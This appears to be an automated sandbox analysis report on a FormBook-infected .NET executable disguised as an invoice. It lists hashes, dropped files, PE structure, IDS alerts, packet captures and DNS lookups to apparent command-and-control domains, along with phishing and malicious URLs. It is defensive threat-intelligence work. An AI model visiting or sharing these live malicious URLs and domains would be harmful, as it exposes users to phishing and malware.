                                          https://na4.docusign.net/Signing/EmailStart.aspx?a=95fa3666-e4d2-4181-926f-7d752b5d1bb7&acct=4b225f64-a250-4de3-9bb5-6320c76f2c33&er=388f7591-fe27-446f-8df0-11aebdd778b2Get hashmaliciousUnknownBrowse
                                          • 35.162.207.33
                                          http://zoom.voipmessage.uk/XTVNEL3Y5b1J3cmNET2VKbmR6bVRsN3V1NmVOY1NGblBJVC9iTE8rdVgxbTVqY2FOZnZ4TUM0ZlFjRHpCR3RWejFXajBVK2d4TW1YbEM3bTdUSWMzV3hrSEFpYnNQL282UDBDM1E0OVhPS1ZjR1JpSzJpRlZZSGVWc3RkVld1K0ZNM2t1YU5qN0hocjRoMWlOeXBkYzlZUXdMYysyWTZaUWtNVVlSWWVCNG1FTnBPWXc3R2RFWjJSbVNEcEw3clVRbTRHVzNRPT0tLUR6bnh4akFBbEUrU3NKL3YtLXRQbTlZaDQ1Tzd4b0NQSFdzTDA4eWc9PQ==Get hashmaliciousUnknownBrowse
                                          • 34.248.74.196
                                          Agreement for Bmangan 5753.pdfGet hashmaliciousHTMLPhisherBrowse
                                          • 13.32.99.103
                                          YBzCUPEvkm.exeGet hashmaliciousUnknownBrowse
                                          • 52.78.112.22
                                          YBzCUPEvkm.exeGet hashmaliciousUnknownBrowse
                                          • 52.78.112.22
                                          http://links.notification.intuit.com/ls/click?upn=u001.4HBRtPy8j6uXsK2aeX2RzAh5EFPhCIIFV3VEN-2Fx7CtL7yL0rqbEG5To4Yn7gWqQ9aLy0xQjXtfA1aWI51jOBcgZZmdPU7rNXiI9qBQrw0Fh0XMUzwxEuUgv3ZFNQWIem-2BNTPYnrL9k9a1nDRjz4a88WPYyDduqTuKohuiQXsusYwJ-2FidZWWf8oC-2Bke5XZf6maHD-2Fd7ablYFhYAopCg9-2FJ24-2F8yZwA220wlNNRUX0yppVttR34V4P26behAEAgmPnWgi1QdqkcH8GVovfzu4LIw-3D-3DQBy7_5Y9C-2B-2Fzbmi1Z8AZ1P0Xb45Ep-2FzkkH96c1HQoTeKyfF3Cy9GA0JrKF-2FtBKU7Gy7tV6PIIEw2aSpbKuiOE5zUrdfKHijLS1CrX6di2rdCWz3230MnOWYRyIFetWhrSPF9k5LzSphdJmNETjrHElDpdShj1s4ILnQWpWcU1acTiMnif850-2BYV-2F5lXeG2jTC-2BOwApN8qupRmwT8fNNE9PPcwErJLxahBxSpmSq91gTlumLJlQuv6Mi-2FueOgXZeZsKYVaksXeYc4hm3iYcmZyYCYz0c5CytX-2FkcYDgjcEPGcMdE4wdmef7F34ZhNuR1BzXUZca-2BlM-2FSHy6Wcv-2B44fNGLavW0-2FgwmkSe7DWrN2Qxs4-2BbmqEK8zVd2B-2F-2BfhLv7s-2BwUYCFzSfpco2w0S0EkPk2QiaigfgYJrhsDWFQrr8XAjN8LEK9fzOOYMlKBdNBCCovn1-2BQdoVowInLACYcfv7UF18ixzp9yjXcoI2GtVtXTFy0zwL-2BunyW6y6aLD3UTkKp7eGuS-2Fs2l9K233QQTHOgsxIsW5yOnAipuno6Jz4FUupJjvG-2FSd7m5GLY99tPmOlknWYVUdaS4l4nbH7zNFdVoP-2Fmr7J9FoB812uhszre4JhgikLbqFLMCT1av4GEdnKOwpstUkw9rVNgxd2MHPktA30uhIQeOnTGGKgw66UsPvJvw-3DGet hashmaliciousUnknownBrowse
                                          • 54.231.169.168
                                          94.156.68.206-mips-2024-07-01T10_28_04.elfGet hashmaliciousUnknownBrowse
                                          • 54.171.230.55

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.log

                                          Download File
                                          Process:C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:true
                                          Reputation:high, very likely benign file
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1172
                                          Entropy (8bit):5.357042452875322
                                          Encrypted:false
                                          SSDEEP:24:3CytZWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:yyjWSU4y4RQmFoUeWmfmZ9tK8NDE
                                          MD5:475D428E7231D005EEA5DB556DBED03F
                                          SHA1:3D603ED4280E0017D1BEB124D68183F8283B5C22
                                          SHA-256:1314488A930843A7E1A003F2E7C1D883DB44ADEC26AC1CA096FE8DC1B4B180F5
                                          SHA-512:7181BDCE6DA8DA8AFD3A973BB2B0BA470468EFF32FFB338DB2662FEFA1A7848ACD87C319706B95401EA18DC873CA098DC722EA6F8B2FD04F1AABD2AEBEA97CF9
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2uqev2r4.clx.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vmgddcww.drg.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xbimuvaa.ij3.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xsh5mtki.chm.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.8996925291967495
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:INVOICE - MV CNC BANGKOK - ST24PJ-278.exe
                                          File size:622'592 bytes
                                          MD5:0559acbaacfcf93cefd8bcbfd498bfe4
                                          SHA1:26142b0abd1848a4aeb96e63ed74836e5af67823
                                          SHA256:251f9b9b5d35ad3ca96da825cea2a7b95f97872a5c6994a9123e203d41093a87
                                          SHA512:e6ca8522526fcd0875d97ee1a77bcc3d11e78c6b72d7c2332331c59daae2bc2adb32ce6c803ebdaa27d4990575688acc09c6cca09664d419353f6f3ee848bcdd
                                          SSDEEP:12288:yEJwtNcDfRDyLA7sGpEBVgWd/3cN1h89cdQpNIcaiwLjnp+YDj:lHfROLIsGUVD1cTh89BZaiQ7x/
                                          TLSH:7ED4122032248F13DABC8FFA2534D64207F7661F2230D6589ED661E72479F868765F8B
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(R................0..v............... ........@.. ....................................@................................

                                          File Icon

                                          Icon Hash:00928e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x4995d2
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0xCF045228 [Mon Jan 22 16:34:48 2080 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x9957e0x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x9a0000x59c.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x9c0000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x9665c0x70.text
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000x975d80x97600be132cf61de3eed7e6639673c823810fFalse0.9247700118703551data7.907761824425078IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0x9a0000x59c0x6001d420d78f253c0d3c1a0bce01d964291False0.4192708333333333data4.060118946076564IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x9c0000xc0x20059bfe2601487272608f23ae29fda96d7False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_VERSION0x9a0900x30cdata0.4358974358974359
                                          RT_MANIFEST0x9a3ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          07/01/24-15:12:33.251065TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.693.127.208.60
                                          07/01/24-15:13:55.420752TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.634.96.226.230
                                          07/01/24-15:11:52.330740TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.6156.67.74.121
                                          07/01/24-15:14:15.758040TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.643.252.160.86
                                          07/01/24-15:11:12.583031TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972880192.168.2.6103.224.182.210
                                          07/01/24-15:11:32.898165TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.644.227.76.166

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jul 1, 2024 15:11:12.578069925 CEST4972880192.168.2.6103.224.182.210
                                          Jul 1, 2024 15:11:12.582865953 CEST8049728103.224.182.210192.168.2.6
                                          Jul 1, 2024 15:11:12.583030939 CEST4972880192.168.2.6103.224.182.210
                                          Jul 1, 2024 15:11:12.583030939 CEST4972880192.168.2.6103.224.182.210
                                          Jul 1, 2024 15:11:12.587939024 CEST8049728103.224.182.210192.168.2.6
                                          Jul 1, 2024 15:11:13.073746920 CEST4972880192.168.2.6103.224.182.210
                                          Jul 1, 2024 15:11:13.078982115 CEST8049728103.224.182.210192.168.2.6
                                          Jul 1, 2024 15:11:13.079160929 CEST4972880192.168.2.6103.224.182.210
                                          Jul 1, 2024 15:11:32.889905930 CEST4973180192.168.2.644.227.76.166
                                          Jul 1, 2024 15:11:32.898041964 CEST804973144.227.76.166192.168.2.6
                                          Jul 1, 2024 15:11:32.898114920 CEST4973180192.168.2.644.227.76.166
                                          Jul 1, 2024 15:11:32.898164988 CEST4973180192.168.2.644.227.76.166
                                          Jul 1, 2024 15:11:32.903150082 CEST804973144.227.76.166192.168.2.6
                                          Jul 1, 2024 15:11:33.401804924 CEST4973180192.168.2.644.227.76.166
                                          Jul 1, 2024 15:11:33.406923056 CEST804973144.227.76.166192.168.2.6
                                          Jul 1, 2024 15:11:33.406991005 CEST4973180192.168.2.644.227.76.166
                                          Jul 1, 2024 15:11:52.322571993 CEST4973580192.168.2.6156.67.74.121
                                          Jul 1, 2024 15:11:52.327446938 CEST8049735156.67.74.121192.168.2.6
                                          Jul 1, 2024 15:11:52.330739975 CEST4973580192.168.2.6156.67.74.121
                                          Jul 1, 2024 15:11:52.330739975 CEST4973580192.168.2.6156.67.74.121
                                          Jul 1, 2024 15:11:52.335547924 CEST8049735156.67.74.121192.168.2.6
                                          Jul 1, 2024 15:11:52.824130058 CEST4973580192.168.2.6156.67.74.121
                                          Jul 1, 2024 15:11:52.839238882 CEST8049735156.67.74.121192.168.2.6
                                          Jul 1, 2024 15:11:52.839325905 CEST4973580192.168.2.6156.67.74.121
                                          Jul 1, 2024 15:12:33.243484974 CEST4973880192.168.2.693.127.208.60
                                          Jul 1, 2024 15:12:33.250818968 CEST804973893.127.208.60192.168.2.6
                                          Jul 1, 2024 15:12:33.251065016 CEST4973880192.168.2.693.127.208.60
                                          Jul 1, 2024 15:12:33.251065016 CEST4973880192.168.2.693.127.208.60
                                          Jul 1, 2024 15:12:33.258531094 CEST804973893.127.208.60192.168.2.6
                                          Jul 1, 2024 15:12:33.762901068 CEST4973880192.168.2.693.127.208.60
                                          Jul 1, 2024 15:12:33.813740015 CEST804973893.127.208.60192.168.2.6
                                          Jul 1, 2024 15:12:33.931709051 CEST804973893.127.208.60192.168.2.6
                                          Jul 1, 2024 15:12:33.931787968 CEST4973880192.168.2.693.127.208.60
                                          Jul 1, 2024 15:12:53.349355936 CEST4974080192.168.2.6198.185.159.144
                                          Jul 1, 2024 15:12:53.354202986 CEST8049740198.185.159.144192.168.2.6
                                          Jul 1, 2024 15:12:53.354295015 CEST4974080192.168.2.6198.185.159.144
                                          Jul 1, 2024 15:12:53.354384899 CEST4974080192.168.2.6198.185.159.144
                                          Jul 1, 2024 15:12:53.359179020 CEST8049740198.185.159.144192.168.2.6
                                          Jul 1, 2024 15:12:53.821005106 CEST8049740198.185.159.144192.168.2.6
                                          Jul 1, 2024 15:12:53.821027040 CEST8049740198.185.159.144192.168.2.6
                                          Jul 1, 2024 15:12:53.821039915 CEST8049740198.185.159.144192.168.2.6
                                          Jul 1, 2024 15:12:53.821171045 CEST4974080192.168.2.6198.185.159.144
                                          Jul 1, 2024 15:12:53.821171045 CEST4974080192.168.2.6198.185.159.144
                                          Jul 1, 2024 15:12:53.826024055 CEST8049740198.185.159.144192.168.2.6

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jul 1, 2024 15:11:12.137726068 CEST5246753192.168.2.61.1.1.1
                                          Jul 1, 2024 15:11:12.577106953 CEST53524671.1.1.1192.168.2.6
                                          Jul 1, 2024 15:11:32.831650972 CEST5518853192.168.2.61.1.1.1
                                          Jul 1, 2024 15:11:32.885814905 CEST53551881.1.1.1192.168.2.6
                                          Jul 1, 2024 15:11:52.246279955 CEST5741053192.168.2.61.1.1.1
                                          Jul 1, 2024 15:11:52.316042900 CEST53574101.1.1.1192.168.2.6
                                          Jul 1, 2024 15:12:12.368423939 CEST5606153192.168.2.61.1.1.1
                                          Jul 1, 2024 15:12:12.516272068 CEST53560611.1.1.1192.168.2.6
                                          Jul 1, 2024 15:12:32.812433958 CEST6346453192.168.2.61.1.1.1
                                          Jul 1, 2024 15:12:33.239950895 CEST53634641.1.1.1192.168.2.6
                                          Jul 1, 2024 15:12:53.296278000 CEST5469253192.168.2.61.1.1.1
                                          Jul 1, 2024 15:12:53.348520041 CEST53546921.1.1.1192.168.2.6
                                          Jul 1, 2024 15:13:34.278865099 CEST5991453192.168.2.61.1.1.1
                                          Jul 1, 2024 15:13:35.292618990 CEST5991453192.168.2.61.1.1.1
                                          Jul 1, 2024 15:13:36.308418989 CEST5991453192.168.2.61.1.1.1
                                          Jul 1, 2024 15:13:37.712945938 CEST53599141.1.1.1192.168.2.6
                                          Jul 1, 2024 15:13:37.712963104 CEST53599141.1.1.1192.168.2.6
                                          Jul 1, 2024 15:13:37.712973118 CEST53599141.1.1.1192.168.2.6
                                          Jul 1, 2024 15:13:54.777581930 CEST5878053192.168.2.61.1.1.1
                                          Jul 1, 2024 15:13:55.409405947 CEST53587801.1.1.1192.168.2.6
                                          Jul 1, 2024 15:14:15.247457027 CEST5108753192.168.2.61.1.1.1
                                          Jul 1, 2024 15:14:15.751517057 CEST53510871.1.1.1192.168.2.6
                                          Jul 1, 2024 15:14:35.902240038 CEST5339453192.168.2.61.1.1.1
                                          Jul 1, 2024 15:14:36.084759951 CEST53533941.1.1.1192.168.2.6
                                          Jul 1, 2024 15:14:58.246103048 CEST6369353192.168.2.61.1.1.1
                                          Jul 1, 2024 15:14:59.261356115 CEST6369353192.168.2.61.1.1.1
                                          Jul 1, 2024 15:15:00.203552961 CEST53636931.1.1.1192.168.2.6
                                          Jul 1, 2024 15:15:00.203660965 CEST53636931.1.1.1192.168.2.6

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jul 1, 2024 15:11:12.137726068 CEST192.168.2.61.1.1.10x4301Standard query (0)www.htgithub.comA (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:11:32.831650972 CEST192.168.2.61.1.1.10x9d38Standard query (0)www.transpecosexpress.comA (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:11:52.246279955 CEST192.168.2.61.1.1.10xe4e0Standard query (0)www.huskyacres.netA (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:12:12.368423939 CEST192.168.2.61.1.1.10xcb61Standard query (0)www.rgrogerscreations.comA (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:12:32.812433958 CEST192.168.2.61.1.1.10x1b10Standard query (0)www.light-in-the-heavens.comA (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:12:53.296278000 CEST192.168.2.61.1.1.10x3cfeStandard query (0)www.amycostellospeech.comA (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:13:34.278865099 CEST192.168.2.61.1.1.10x73e6Standard query (0)www.xsmci844n.xyzA (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:13:35.292618990 CEST192.168.2.61.1.1.10x73e6Standard query (0)www.xsmci844n.xyzA (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:13:36.308418989 CEST192.168.2.61.1.1.10x73e6Standard query (0)www.xsmci844n.xyzA (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:13:54.777581930 CEST192.168.2.61.1.1.10x4acbStandard query (0)www.whatsapp-p.vipA (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:14:15.247457027 CEST192.168.2.61.1.1.10x7eadStandard query (0)www.0909000000.comA (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:14:35.902240038 CEST192.168.2.61.1.1.10x4913Standard query (0)www.parsendustriyel.comA (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:14:58.246103048 CEST192.168.2.61.1.1.10x5025Standard query (0)www.vpdyt637j.xyzA (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:14:59.261356115 CEST192.168.2.61.1.1.10x5025Standard query (0)www.vpdyt637j.xyzA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jul 1, 2024 15:11:12.577106953 CEST1.1.1.1192.168.2.60x4301No error (0)www.htgithub.com103.224.182.210A (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:11:32.885814905 CEST1.1.1.1192.168.2.60x9d38No error (0)www.transpecosexpress.compixie.porkbun.comCNAME (Canonical name)IN (0x0001)false
                                          Jul 1, 2024 15:11:32.885814905 CEST1.1.1.1192.168.2.60x9d38No error (0)pixie.porkbun.com44.227.76.166A (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:11:32.885814905 CEST1.1.1.1192.168.2.60x9d38No error (0)pixie.porkbun.com44.227.65.245A (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:11:52.316042900 CEST1.1.1.1192.168.2.60xe4e0No error (0)www.huskyacres.nethuskyacres.netCNAME (Canonical name)IN (0x0001)false
                                          Jul 1, 2024 15:11:52.316042900 CEST1.1.1.1192.168.2.60xe4e0No error (0)huskyacres.net156.67.74.121A (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:12:12.516272068 CEST1.1.1.1192.168.2.60xcb61Name error (3)www.rgrogerscreations.comnonenoneA (IP address)IN (0x0001)false
